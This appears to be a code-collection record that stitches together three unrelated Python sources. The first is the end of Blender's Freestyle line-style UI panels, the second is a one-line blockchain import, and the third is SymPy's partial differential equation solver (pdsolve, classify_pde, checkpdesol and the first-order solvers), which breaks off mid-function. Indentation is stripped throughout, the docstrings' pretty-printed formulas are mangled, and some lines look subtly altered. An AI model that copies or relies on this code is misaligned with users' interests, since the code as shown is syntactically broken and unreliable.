row.prop(modifier, "thickness_max")
row = box.row(align=True)
row.prop(modifier, "curvature_min")
row.prop(modifier, "curvature_max")
freestyle = context.view_layer.freestyle_settings
if not freestyle.use_smoothness:
message = "Enable Face Smoothness to use this modifier"
self.draw_modifier_box_error(col.box(), modifier, message)
def draw_geometry_modifier(self, _context, modifier):
layout = self.layout
col = layout.column(align=True)
self.draw_modifier_box_header(col.box(), modifier)
if modifier.expanded:
box = col.box()
if modifier.type == 'SAMPLING':
box.prop(modifier, "sampling")
elif modifier.type == 'BEZIER_CURVE':
box.prop(modifier, "error")
elif modifier.type == 'SINUS_DISPLACEMENT':
split = box.split()
col = split.column()
col.prop(modifier, "wavelength")
col.prop(modifier, "amplitude")
col = split.column()
col.prop(modifier, "phase")
elif modifier.type == 'SPATIAL_NOISE':
split = box.split()
col = split.column()
col.prop(modifier, "amplitude")
col.prop(modifier, "scale")
col.prop(modifier, "octaves")
col = split.column()
col.prop(modifier, "smooth")
col.prop(modifier, "use_pure_random")
elif modifier.type == 'PERLIN_NOISE_1D':
split = box.split()
col = split.column()
col.prop(modifier, "frequency")
col.prop(modifier, "amplitude")
col.prop(modifier, "seed")
col = split.column()
col.prop(modifier, "octaves")
col.prop(modifier, "angle")
elif modifier.type == 'PERLIN_NOISE_2D':
split = box.split()
col = split.column()
col.prop(modifier, "frequency")
col.prop(modifier, "amplitude")
col.prop(modifier, "seed")
col = split.column()
col.prop(modifier, "octaves")
col.prop(modifier, "angle")
elif modifier.type == 'BACKBONE_STRETCHER':
box.prop(modifier, "backbone_length")
elif modifier.type == 'TIP_REMOVER':
box.prop(modifier, "tip_length")
elif modifier.type == 'POLYGONIZATION':
box.prop(modifier, "error")
elif modifier.type == 'GUIDING_LINES':
box.prop(modifier, "offset")
elif modifier.type == 'BLUEPRINT':
row = box.row()
row.prop(modifier, "shape", expand=True)
box.prop(modifier, "rounds")
row = box.row()
if modifier.shape in {'CIRCLES', 'ELLIPSES'}:
row.prop(modifier, "random_radius")
row.prop(modifier, "random_center")
elif modifier.shape == 'SQUARES':
row.prop(modifier, "backbone_length")
row.prop(modifier, "random_backbone")
elif modifier.type == '2D_OFFSET':
row = box.row(align=True)
row.prop(modifier, "start")
row.prop(modifier, "end")
row = box.row(align=True)
row.prop(modifier, "x")
row.prop(modifier, "y")
elif modifier.type == '2D_TRANSFORM':
box.prop(modifier, "pivot")
if modifier.pivot == 'PARAM':
box.prop(modifier, "pivot_u")
elif modifier.pivot == 'ABSOLUTE':
row = box.row(align=True)
row.prop(modifier, "pivot_x")
row.prop(modifier, "pivot_y")
row = box.row(align=True)
row.prop(modifier, "scale_x")
row.prop(modifier, "scale_y")
box.prop(modifier, "angle")
elif modifier.type == 'SIMPLIFICATION':
box.prop(modifier, "tolerance")
def draw(self, context):
layout = self.layout
view_layer = context.view_layer
lineset = view_layer.freestyle_settings.linesets.active
layout.active = view_layer.use_freestyle
if lineset is None:
return
linestyle = lineset.linestyle
layout.template_ID(lineset, "linestyle", new="scene.freestyle_linestyle_new")
if linestyle is None:
return
row = layout.row(align=True)
row.prop(linestyle, "panel", expand=True)
if linestyle.panel == 'STROKES':
# Chaining
layout.prop(linestyle, "use_chaining", text="Chaining:")
split = layout.split(align=True)
split.active = linestyle.use_chaining
# First column
col = split.column()
col.active = linestyle.use_chaining
col.prop(linestyle, "chaining", text="")
if linestyle.chaining == 'SKETCHY':
col.prop(linestyle, "rounds")
# Second column
col = split.column()
col.prop(linestyle, "use_same_object")
# Splitting
layout.label(text="Splitting:")
split = layout.split(align=True)
# First column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_angle_min", text="")
sub = row.row()
sub.active = linestyle.use_angle_min
sub.prop(linestyle, "angle_min")
row = col.row(align=True)
row.prop(linestyle, "use_angle_max", text="")
sub = row.row()
sub.active = linestyle.use_angle_max
sub.prop(linestyle, "angle_max")
# Second column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_split_length", text="")
sub = row.row()
sub.active = linestyle.use_split_length
sub.prop(linestyle, "split_length", text="2D Length")
row = col.row(align=True)
row.prop(linestyle, "material_boundary")
# End of columns
row = layout.row(align=True)
row.prop(linestyle, "use_split_pattern", text="")
sub = row.row(align=True)
sub.active = linestyle.use_split_pattern
sub.prop(linestyle, "split_dash1", text="D1")
sub.prop(linestyle, "split_gap1", text="G1")
sub.prop(linestyle, "split_dash2", text="D2")
sub.prop(linestyle, "split_gap2", text="G2")
sub.prop(linestyle, "split_dash3", text="D3")
sub.prop(linestyle, "split_gap3", text="G3")
# Sorting
layout.prop(linestyle, "use_sorting", text="Sorting:")
col = layout.column()
col.active = linestyle.use_sorting
row = col.row(align=True)
row.prop(linestyle, "sort_key", text="")
sub = row.row()
sub.active = linestyle.sort_key in {'DISTANCE_FROM_CAMERA',
'PROJECTED_X',
'PROJECTED_Y'}
sub.prop(linestyle, "integration_type", text="")
row = col.row(align=True)
row.prop(linestyle, "sort_order", expand=True)
# Selection
layout.label(text="Selection:")
split = layout.split(align=True)
# First column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_length_min", text="")
sub = row.row()
sub.active = linestyle.use_length_min
sub.prop(linestyle, "length_min")
row = col.row(align=True)
row.prop(linestyle, "use_length_max", text="")
sub = row.row()
sub.active = linestyle.use_length_max
sub.prop(linestyle, "length_max")
# Second column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_chain_count", text="")
sub = row.row()
sub.active = linestyle.use_chain_count
sub.prop(linestyle, "chain_count")
# Caps
layout.label(text="Caps:")
row = layout.row(align=True)
row.prop(linestyle, "caps", expand=True)
# Dashed lines
layout.prop(linestyle, "use_dashed_line", text="Dashed Line:")
row = layout.row(align=True)
row.active = linestyle.use_dashed_line
row.prop(linestyle, "dash1", text="D1")
row.prop(linestyle, "gap1", text="G1")
row.prop(linestyle, "dash2", text="D2")
row.prop(linestyle, "gap2", text="G2")
row.prop(linestyle, "dash3", text="D3")
row.prop(linestyle, "gap3", text="G3")
elif linestyle.panel == 'COLOR':
col = layout.column()
row = col.row()
row.label(text="Base Color:")
row.prop(linestyle, "color", text="")
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_color_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.color_modifiers:
self.draw_color_modifier(context, modifier)
elif linestyle.panel == 'ALPHA':
col = layout.column()
row = col.row()
row.label(text="Base Transparency:")
row.prop(linestyle, "alpha")
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_alpha_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.alpha_modifiers:
self.draw_alpha_modifier(context, modifier)
elif linestyle.panel == 'THICKNESS':
col = layout.column()
row = col.row()
row.label(text="Base Thickness:")
row.prop(linestyle, "thickness")
subcol = col.column()
subcol.active = linestyle.chaining == 'PLAIN' and linestyle.use_same_object
row = subcol.row()
row.prop(linestyle, "thickness_position", expand=True)
row = subcol.row()
row.prop(linestyle, "thickness_ratio")
row.active = (linestyle.thickness_position == 'RELATIVE')
col = layout.column()
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_thickness_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.thickness_modifiers:
self.draw_thickness_modifier(context, modifier)
elif linestyle.panel == 'GEOMETRY':
col = layout.column()
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_geometry_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.geometry_modifiers:
self.draw_geometry_modifier(context, modifier)
elif linestyle.panel == 'TEXTURE':
layout.separator()
row = layout.row()
row.prop(linestyle, "use_nodes")
row.prop(linestyle, "texture_spacing", text="Spacing Along Stroke")
row = layout.row()
props = row.operator(
"wm.properties_context_change",
text="Go to Linestyle Textures Properties",
icon='TEXTURE',
)
props.context = 'TEXTURE'
elif linestyle.panel == 'MISC':
pass
# Material properties
class MaterialFreestyleButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "material"
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
scene = context.scene
material = context.material
with_freestyle = bpy.app.build_options.freestyle
return (
with_freestyle and material and scene and scene.render.use_freestyle and
(context.engine in cls.COMPAT_ENGINES)
)
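# Illustrative note (assumed usage, not part of this file's logic): the
# COMPAT_ENGINES membership check in poll() above is the hook the comment in
# this mixin refers to. An external render engine add-on would typically opt
# in with something like
#
#     MATERIAL_PT_freestyle_line.COMPAT_ENGINES.add('MY_CUSTOM_ENGINE')
#
# where 'MY_CUSTOM_ENGINE' stands for that engine's idname; the panel defined
# below then becomes visible when that engine is active.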
class MATERIAL_PT_freestyle_line(MaterialFreestyleButtonsPanel, Panel):
bl_label = "Freestyle Line"
bl_options = {'DEFAULT_CLOSED'}
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw(self, context):
layout = self.layout
mat = context.material
row = layout.row()
row.prop(mat, "line_color", text="")
row.prop(mat, "line_priority", text="Priority")
classes = (
RENDER_PT_freestyle,
VIEWLAYER_UL_linesets,
RENDER_MT_lineset_context_menu,
VIEWLAYER_PT_freestyle,
VIEWLAYER_PT_freestyle_lineset,
VIEWLAYER_PT_freestyle_linestyle,
MATERIAL_PT_freestyle_line,
)
if __name__ == "__main__": # only for live edit.
from bpy.utils import register_class
for cls in classes:
register_class(cls)
|
from .base import Block, GenesisBlock, BlockChain
|
"""
This module contains pdsolve() and different helper functions that it
uses. It is heavily inspired by the ode module and hence the basic
infrastructure remains the same.
**Functions in this module**
These are the user functions in this module:
        - pdsolve() - Solves PDEs
        - classify_pde() - Classifies PDEs into possible hints for pdsolve().
- pde_separate() - Separate variables in partial differential equation either by
additive or multiplicative separation approach.
These are the helper functions in this module:
- pde_separate_add() - Helper function for searching additive separable solutions.
- pde_separate_mul() - Helper function for searching multiplicative
separable solutions.
**Currently implemented solver methods**
The following methods are implemented for solving partial differential
equations. See the docstrings of the various pde_hint() functions for
more information on each (run help(pde)):
- 1st order linear homogeneous partial differential equations
with constant coefficients.
- 1st order linear general partial differential equations
with constant coefficients.
- 1st order linear partial differential equations with
variable coefficients.
"""
from itertools import combinations_with_replacement
from sympy.simplify import simplify # type: ignore
from sympy.core import Add, S
from sympy.core.compatibility import reduce, is_sequence
from sympy.core.function import Function, expand, AppliedUndef, Subs
from sympy.core.relational import Equality, Eq
from sympy.core.symbol import Symbol, Wild, symbols
from sympy.functions import exp
from sympy.integrals.integrals import Integral
from sympy.utilities.iterables import has_dups
from sympy.utilities.misc import filldedent
from sympy.solvers.deutils import _preprocess, ode_order, _desolve
from sympy.solvers.solvers import solve
from sympy.simplify.radsimp import collect
import operator
allhints = (
"1st_linear_constant_coeff_homogeneous",
"1st_linear_constant_coeff",
"1st_linear_constant_coeff_Integral",
"1st_linear_variable_coeff"
)
def pdsolve(eq, func=None, hint='default', dict=False, solvefun=None, **kwargs):
"""
Solves any (supported) kind of partial differential equation.
**Usage**
pdsolve(eq, f(x,y), hint) -> Solve partial differential equation
eq for function f(x,y), using method hint.
**Details**
``eq`` can be any supported partial differential equation (see
the pde docstring for supported methods). This can either
be an Equality, or an expression, which is assumed to be
equal to 0.
``f(x,y)`` is a function of two variables whose derivatives in that
variable make up the partial differential equation. In many
cases it is not necessary to provide this; it will be autodetected
(and an error raised if it couldn't be detected).
``hint`` is the solving method that you want pdsolve to use. Use
classify_pde(eq, f(x,y)) to get all of the possible hints for
a PDE. The default hint, 'default', will use whatever hint
is returned first by classify_pde(). See Hints below for
more options that you can use for hint.
``solvefun`` is the convention used for arbitrary functions returned
by the PDE solver. If not set by the user, it is set by default
to be F.
**Hints**
Aside from the various solving methods, there are also some
meta-hints that you can pass to pdsolve():
"default":
This uses whatever hint is returned first by
classify_pde(). This is the default argument to
pdsolve().
"all":
To make pdsolve apply all relevant classification hints,
use pdsolve(PDE, func, hint="all"). This will return a
                dictionary of hint:solution terms. If a hint causes
                pdsolve to raise the NotImplementedError, the value of that
                hint's key will be the exception object raised. The
dictionary will also include some special keys:
- order: The order of the PDE. See also ode_order() in
deutils.py
- default: The solution that would be returned by
default. This is the one produced by the hint that
appears first in the tuple returned by classify_pde().
"all_Integral":
This is the same as "all", except if a hint also has a
corresponding "_Integral" hint, it only returns the
"_Integral" hint. This is useful if "all" causes
pdsolve() to hang because of a difficult or impossible
integral. This meta-hint will also be much faster than
"all", because integrate() is an expensive routine.
See also the classify_pde() docstring for more info on hints,
and the pde docstring for a list of all supported hints.
**Tips**
- You can declare the derivative of an unknown function this way:
>>> from sympy import Function, Derivative
>>> from sympy.abc import x, y # x and y are the independent variables
>>> f = Function("f")(x, y) # f is a function of x and y
>>> # fx will be the partial derivative of f with respect to x
>>> fx = Derivative(f, x)
>>> # fy will be the partial derivative of f with respect to y
>>> fy = Derivative(f, y)
- See test_pde.py for many tests, which serves also as a set of
examples for how to use pdsolve().
- pdsolve always returns an Equality class (except for the case
when the hint is "all" or "all_Integral"). Note that it is not possible
          to get an explicit solution for f(x, y) as in the case of ODEs.
        - Do help(pde.pde_hintname) to get more information on a
          specific hint
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, Eq
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> u = f(x, y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)
>>> pdsolve(eq)
Eq(f(x, y), F(3*x - 2*y)*exp(-2*x/13 - 3*y/13))
"""
if not solvefun:
solvefun = Function('F')
# See the docstring of _desolve for more details.
hints = _desolve(eq, func=func, hint=hint, simplify=True,
type='pde', **kwargs)
eq = hints.pop('eq', False)
all_ = hints.pop('all', False)
if all_:
# TODO : 'best' hint should be implemented when adequate
# number of hints are added.
pdedict = {}
failed_hints = {}
gethints = classify_pde(eq, dict=True)
pdedict.update({'order': gethints['order'],
'default': gethints['default']})
for hint in hints:
try:
rv = _helper_simplify(eq, hint, hints[hint]['func'],
hints[hint]['order'], hints[hint][hint], solvefun)
except NotImplementedError as detail:
failed_hints[hint] = detail
else:
pdedict[hint] = rv
pdedict.update(failed_hints)
return pdedict
else:
return _helper_simplify(eq, hints['hint'], hints['func'],
hints['order'], hints[hints['hint']], solvefun)
def _helper_simplify(eq, hint, func, order, match, solvefun):
"""Helper function of pdsolve that calls the respective
pde functions to solve for the partial differential
equations. This minimizes the computation in
calling _desolve multiple times.
"""
if hint.endswith("_Integral"):
solvefunc = globals()[
"pde_" + hint[:-len("_Integral")]]
else:
solvefunc = globals()["pde_" + hint]
return _handle_Integral(solvefunc(eq, func, order,
match, solvefun), func, order, hint)
def _handle_Integral(expr, func, order, hint):
r"""
Converts a solution with integrals in it into an actual solution.
Simplifies the integral mainly using doit()
"""
if hint.endswith("_Integral"):
return expr
elif hint == "1st_linear_constant_coeff":
return simplify(expr.doit())
else:
return expr
def classify_pde(eq, func=None, dict=False, *, prep=True, **kwargs):
"""
Returns a tuple of possible pdsolve() classifications for a PDE.
The tuple is ordered so that first item is the classification that
pdsolve() uses to solve the PDE by default. In general,
classifications near the beginning of the list will produce
better solutions faster than those near the end, though there are
always exceptions. To make pdsolve use a different classification,
use pdsolve(PDE, func, hint=<classification>). See also the pdsolve()
docstring for different meta-hints you can use.
If ``dict`` is true, classify_pde() will return a dictionary of
hint:match expression terms. This is intended for internal use by
pdsolve(). Note that because dictionaries are ordered arbitrarily,
this will most likely not be in the same order as the tuple.
You can get help on different hints by doing help(pde.pde_hintname),
where hintname is the name of the hint without "_Integral".
See sympy.pde.allhints or the sympy.pde docstring for a list of all
supported hints that can be returned from classify_pde.
Examples
========
>>> from sympy.solvers.pde import classify_pde
>>> from sympy import Function, Eq
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> u = f(x, y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)
>>> classify_pde(eq)
('1st_linear_constant_coeff_homogeneous',)
"""
if func and len(func.args) != 2:
raise NotImplementedError("Right now only partial "
"differential equations of two variables are supported")
if prep or func is None:
prep, func_ = _preprocess(eq, func)
if func is None:
func = func_
if isinstance(eq, Equality):
if eq.rhs != 0:
return classify_pde(eq.lhs - eq.rhs, func)
eq = eq.lhs
f = func.func
x = func.args[0]
y = func.args[1]
fx = f(x,y).diff(x)
fy = f(x,y).diff(y)
# TODO : For now pde.py uses support offered by the ode_order function
# to find the order with respect to a multi-variable function. An
# improvement could be to classify the order of the PDE on the basis of
# individual variables.
order = ode_order(eq, f(x,y))
# hint:matchdict or hint:(tuple of matchdicts)
# Also will contain "default":<default hint> and "order":order items.
matching_hints = {'order': order}
if not order:
if dict:
matching_hints["default"] = None
return matching_hints
else:
return ()
eq = expand(eq)
a = Wild('a', exclude = [f(x,y)])
b = Wild('b', exclude = [f(x,y), fx, fy, x, y])
c = Wild('c', exclude = [f(x,y), fx, fy, x, y])
d = Wild('d', exclude = [f(x,y), fx, fy, x, y])
e = Wild('e', exclude = [f(x,y), fx, fy])
n = Wild('n', exclude = [x, y])
# Try removing the smallest power of f(x,y)
# from the highest partial derivatives of f(x,y)
reduced_eq = None
if eq.is_Add:
var = set(combinations_with_replacement((x,y), order))
dummyvar = var.copy()
power = None
for i in var:
coeff = eq.coeff(f(x,y).diff(*i))
if coeff != 1:
match = coeff.match(a*f(x,y)**n)
if match and match[a]:
power = match[n]
dummyvar.remove(i)
break
dummyvar.remove(i)
for i in dummyvar:
coeff = eq.coeff(f(x,y).diff(*i))
if coeff != 1:
match = coeff.match(a*f(x,y)**n)
if match and match[a] and match[n] < power:
power = match[n]
if power:
den = f(x,y)**power
reduced_eq = Add(*[arg/den for arg in eq.args])
if not reduced_eq:
reduced_eq = eq
if order == 1:
reduced_eq = collect(reduced_eq, f(x, y))
r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
if r:
if not r[e]:
## Linear first-order homogeneous partial-differential
## equation with constant coefficients
r.update({'b': b, 'c': c, 'd': d})
matching_hints["1st_linear_constant_coeff_homogeneous"] = r
else:
if r[b]**2 + r[c]**2 != 0:
## Linear first-order general partial-differential
## equation with constant coefficients
r.update({'b': b, 'c': c, 'd': d, 'e': e})
matching_hints["1st_linear_constant_coeff"] = r
matching_hints[
"1st_linear_constant_coeff_Integral"] = r
else:
b = Wild('b', exclude=[f(x, y), fx, fy])
c = Wild('c', exclude=[f(x, y), fx, fy])
d = Wild('d', exclude=[f(x, y), fx, fy])
r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
if r:
r.update({'b': b, 'c': c, 'd': d, 'e': e})
matching_hints["1st_linear_variable_coeff"] = r
# Order keys based on allhints.
retlist = []
for i in allhints:
if i in matching_hints:
retlist.append(i)
if dict:
# Dictionaries are ordered arbitrarily, so make note of which
# hint would come first for pdsolve(). Use an ordered dict in Py 3.
matching_hints["default"] = None
matching_hints["ordered_hints"] = tuple(retlist)
for i in allhints:
if i in matching_hints:
matching_hints["default"] = i
break
return matching_hints
else:
return tuple(retlist)
def checkpdesol(pde, sol, func=None, solve_for_func=True):
"""
Checks if the given solution satisfies the partial differential
equation.
pde is the partial differential equation which can be given in the
form of an equation or an expression. sol is the solution for which
the pde is to be checked. This can also be given in an equation or
an expression form. If the function is not provided, the helper
function _preprocess from deutils is used to identify the function.
If a sequence of solutions is passed, the same sort of container will be
used to return the result for each solution.
The following methods are currently being implemented to check if the
solution satisfies the PDE:
1. Directly substitute the solution in the PDE and check. If the
solution hasn't been solved for f, then it will solve for f
provided solve_for_func hasn't been set to False.
If the solution satisfies the PDE, then a tuple (True, 0) is returned.
Otherwise a tuple (False, expr) where expr is the value obtained
after substituting the solution in the PDE. However if a known solution
returns False, it may be due to the inability of doit() to simplify it to zero.
Examples
========
>>> from sympy import Function, symbols
>>> from sympy.solvers.pde import checkpdesol, pdsolve
>>> x, y = symbols('x y')
>>> f = Function('f')
>>> eq = 2*f(x,y) + 3*f(x,y).diff(x) + 4*f(x,y).diff(y)
>>> sol = pdsolve(eq)
>>> assert checkpdesol(eq, sol)[0]
>>> eq = x*f(x,y) + f(x,y).diff(x)
>>> checkpdesol(eq, sol)
(False, (x*F(4*x - 3*y) - 6*F(4*x - 3*y)/25 + 4*Subs(Derivative(F(_xi_1), _xi_1), _xi_1, 4*x - 3*y))*exp(-6*x/25 - 8*y/25))
"""
# Converting the pde into an equation
if not isinstance(pde, Equality):
pde = Eq(pde, 0)
# If no function is given, try finding the function present.
if func is None:
try:
_, func = _preprocess(pde.lhs)
except ValueError:
funcs = [s.atoms(AppliedUndef) for s in (
sol if is_sequence(sol, set) else [sol])]
funcs = set().union(funcs)
if len(funcs) != 1:
raise ValueError(
'must pass func arg to checkpdesol for this case.')
func = funcs.pop()
# If the given solution is in the form of a list or a set
# then return a list or set of tuples.
if is_sequence(sol, set):
return type(sol)([checkpdesol(
pde, i, func=func,
solve_for_func=solve_for_func) for i in sol])
# Convert solution into an equation
if not isinstance(sol, Equality):
sol = Eq(func, sol)
elif sol.rhs == func:
sol = sol.reversed
# Try solving for the function
solved = sol.lhs == func and not sol.rhs.has(func)
if solve_for_func and not solved:
solved = solve(sol, func)
if solved:
if len(solved) == 1:
return checkpdesol(pde, Eq(func, solved[0]),
func=func, solve_for_func=False)
else:
return checkpdesol(pde, [Eq(func, t) for t in solved],
func=func, solve_for_func=False)
# try direct substitution of the solution into the PDE and simplify
if sol.lhs == func:
pde = pde.lhs - pde.rhs
s = simplify(pde.subs(func, sol.rhs).doit())
return s is S.Zero, s
raise NotImplementedError(filldedent('''
Unable to test if %s is a solution to %s.''' % (sol, pde)))
def pde_1st_linear_constant_coeff_homogeneous(eq, func, order, match, solvefun):
r"""
Solves a first order linear homogeneous
partial differential equation with constant coefficients.
The general form of this partial differential equation is
.. math:: a \frac{\partial f(x,y)}{\partial x}
+ b \frac{\partial f(x,y)}{\partial y} + c f(x,y) = 0
where `a`, `b` and `c` are constants.
The general solution is of the form:
.. math::
f(x, y) = F(- a y + b x ) e^{- \frac{c (a x + b y)}{a^2 + b^2}}
and can be found in SymPy with ``pdsolve``::
>>> from sympy.solvers import pdsolve
>>> from sympy.abc import x, y, a, b, c
>>> from sympy import Function, pprint
>>> f = Function('f')
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a*ux + b*uy + c*u
>>> pprint(genform)
d d
a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y)
dx dy
>>> pprint(pdsolve(genform))
-c*(a*x + b*y)
---------------
2 2
a + b
f(x, y) = F(-a*y + b*x)*e
Examples
========
>>> from sympy import pdsolve
>>> from sympy import Function, pprint
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y))
Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
>>> pprint(pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)))
x y
- - - -
2 2
f(x, y) = F(x - y)*e
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
# TODO : For now homogeneous first order linear PDE's having
# two variables are implemented. Once there is support for
# solving systems of ODE's, this can be extended to n variables.
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
return Eq(f(x,y), exp(-S(d)/(b**2 + c**2)*(b*x + c*y))*solvefun(c*x - b*y))
def pde_1st_linear_constant_coeff(eq, func, order, match, solvefun):
r"""
Solves a first order linear partial differential equation
with constant coefficients.
The general form of this partial differential equation is
.. math:: a \frac{\partial f(x,y)}{\partial x}
+ b \frac{\partial f(x,y)}{\partial y}
+ c f(x,y) = G(x,y)
where `a`, `b` and `c` are constants and `G(x, y)` can be an arbitrary
function in `x` and `y`.
The general solution of the PDE is:
.. math::
f(x, y) = \left. \left[F(\eta) + \frac{1}{a^2 + b^2}
\int\limits^{a x + b y} G\left(\frac{a \xi + b \eta}{a^2 + b^2},
\frac{- a \eta + b \xi}{a^2 + b^2} \right)
e^{\frac{c \xi}{a^2 + b^2}}\, d\xi\right]
e^{- \frac{c \xi}{a^2 + b^2}}
\right|_{\substack{\eta=- a y + b x\\ \xi=a x + b y }}\, ,
where `F(\eta)` is an arbitrary single-valued function. The solution
can be found in SymPy with ``pdsolve``::
>>> from sympy.solvers import pdsolve
>>> from sympy.abc import x, y, a, b, c
>>> from sympy import Function, pprint
>>> f = Function('f')
>>> G = Function('G')
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a*ux + b*uy + c*u - G(x,y)
>>> pprint(genform)
d d
a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y) - G(x, y)
dx dy
>>> pprint(pdsolve(genform, hint='1st_linear_constant_coeff_Integral'))
// a*x + b*y \
|| / |
|| | |
|| | c*xi |
|| | ------- |
|| | 2 2 |
|| | /a*xi + b*eta -a*eta + b*xi\ a + b |
|| | G|------------, -------------|*e d(xi)|
|| | | 2 2 2 2 | |
|| | \ a + b a + b / |
|| | |
|| / |
|| |
f(x, y) = ||F(eta) + -------------------------------------------------------|*
|| 2 2 |
\\ a + b /
<BLANKLINE>
\|
||
||
||
||
||
||
||
||
-c*xi ||
-------||
2 2||
a + b ||
e ||
||
/|eta=-a*y + b*x, xi=a*x + b*y
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, pprint, exp
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> eq = -2*f(x,y).diff(x) + 4*f(x,y).diff(y) + 5*f(x,y) - exp(x + 3*y)
>>> pdsolve(eq)
Eq(f(x, y), (F(4*x + 2*y) + exp(x/2 + 4*y)/15)*exp(x/2 - y))
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
    # TODO : For now first order linear PDE's having
    # two variables are implemented. Once there is support for
    # solving systems of ODE's, this can be extended to n variables.
xi, eta = symbols("xi eta")
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
e = -match[match['e']]
expterm = exp(-S(d)/(b**2 + c**2)*xi)
functerm = solvefun(eta)
solvedict = solve((b*x + c*y - xi, c*x - b*y - eta), x, y)
# Integral should remain as it is in terms of xi,
# doit() should be done in _handle_Integral.
genterm = (1/S(b**2 + c**2))*Integral(
(1/expterm*e).subs(solvedict), (xi, b*x + c*y))
return Eq(f(x,y), Subs(expterm*(functerm + genterm),
(eta, xi), (c*x - b*y, b*x + c*y)))
def pde_1st_linear_variable_coeff(eq, func, order, match, solvefun):
r"""
Solves a first order linear partial differential equation
with variable coefficients. The general form of this partial
differential equation is
.. math:: a(x, y) \frac{\partial f(x, y)}{\partial x}
+ b(x, y) \frac{\partial f(x, y)}{\partial y}
+ c(x, y) f(x, y) = G(x, y)
where `a(x, y)`, `b(x, y)`, `c(x, y)` and `G(x, y)` are arbitrary
functions in `x` and `y`. This PDE is converted into an ODE by
making the following transformation:
1. `\xi` as `x`
2. `\eta` as the constant in the solution to the differential
equation `\frac{dy}{dx} = -\frac{b}{a}`
Making the previous substitutions reduces it to the linear ODE
.. math:: a(\xi, \eta)\frac{du}{d\xi} + c(\xi, \eta)u - G(\xi, \eta) = 0
which can be solved using ``dsolve``.
>>> from sympy.abc import x, y
>>> from sympy import Function, pprint
>>> a, b, c, G, f= [Function(i) for i in ['a', 'b', 'c', 'G', 'f']]
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a(x, y)*u + b(x, y)*ux + c(x, y)*uy - G(x,y)
>>> pprint(genform)
d d
-G(x, y) + a(x, y)*f(x, y) + b(x, y)*--(f(x, y)) + c(x, y)*--(f(x, y))
dx dy
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, pprint
>>> from sympy.abc import x,y
>>> f = Function('f')
    >>> u = f(x, y)
    >>> eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
>>> pdsolve(eq)
Eq(f(x, y), F(x*y)*exp(y**2/2) + 1)
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
from sympy.integrals.integrals import integrate
from sympy.solvers.ode import dsolve
xi, eta = symbols("xi eta")
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
e = -match[match['e']]
if not d:
# To deal with cases like b*ux = e or c*uy = e
if not (b and c):
if c:
try:
tsol = integrate(e/c, y)
except NotImplementedError:
raise NotImplementedError("Unable to find a solution"
" due to inability of integrate")
else:
return Eq(f(x,y), solvefun(x) + tsol)
if b:
try:
tsol = integrate(e/b, x)
except NotImplementedError:
raise NotImplementedError("Unable to find a solution"
" due to inability of integrate")
else:
return Eq(f(x,y), solvefun(y) + tsol)
if not c:
# To deal with cases when c is 0, a simpler method is used.
# The PDE reduces to b*(u.diff(x)) + d*u = e, which is a linear ODE in x
plode = f(x).diff(x)*b + d*f(x) - e
sol = dsolve(plode, f(x))
syms = sol.free_symbols - plode.free_symbols - {x, y}
rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, y)
return Eq(f(x, y), rhs)
if not b:
# To deal with cases when b is 0, a simpler method is used.
# The PDE reduces to c*(u.diff(y)) + d*u = e, which is a linear ODE in y
plode = f(y).diff(y)*c + d*f(y) - e
sol = dsolve(plode, f(y))
syms = sol.free_symbols - plode.free_symbols - {x, y}
rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, x)
return Eq(f(x, y), rhs)
dummy = Function('d')
h = (c/b).subs(y, dummy(x))
sol = dsolve(dummy(x).diff(x) - h, dummy(x))
if isinstance(sol, list):
sol = sol[0]
solsym = sol.free_symbols - h.free_symbols - {x, y}
if len(solsym) == 1:
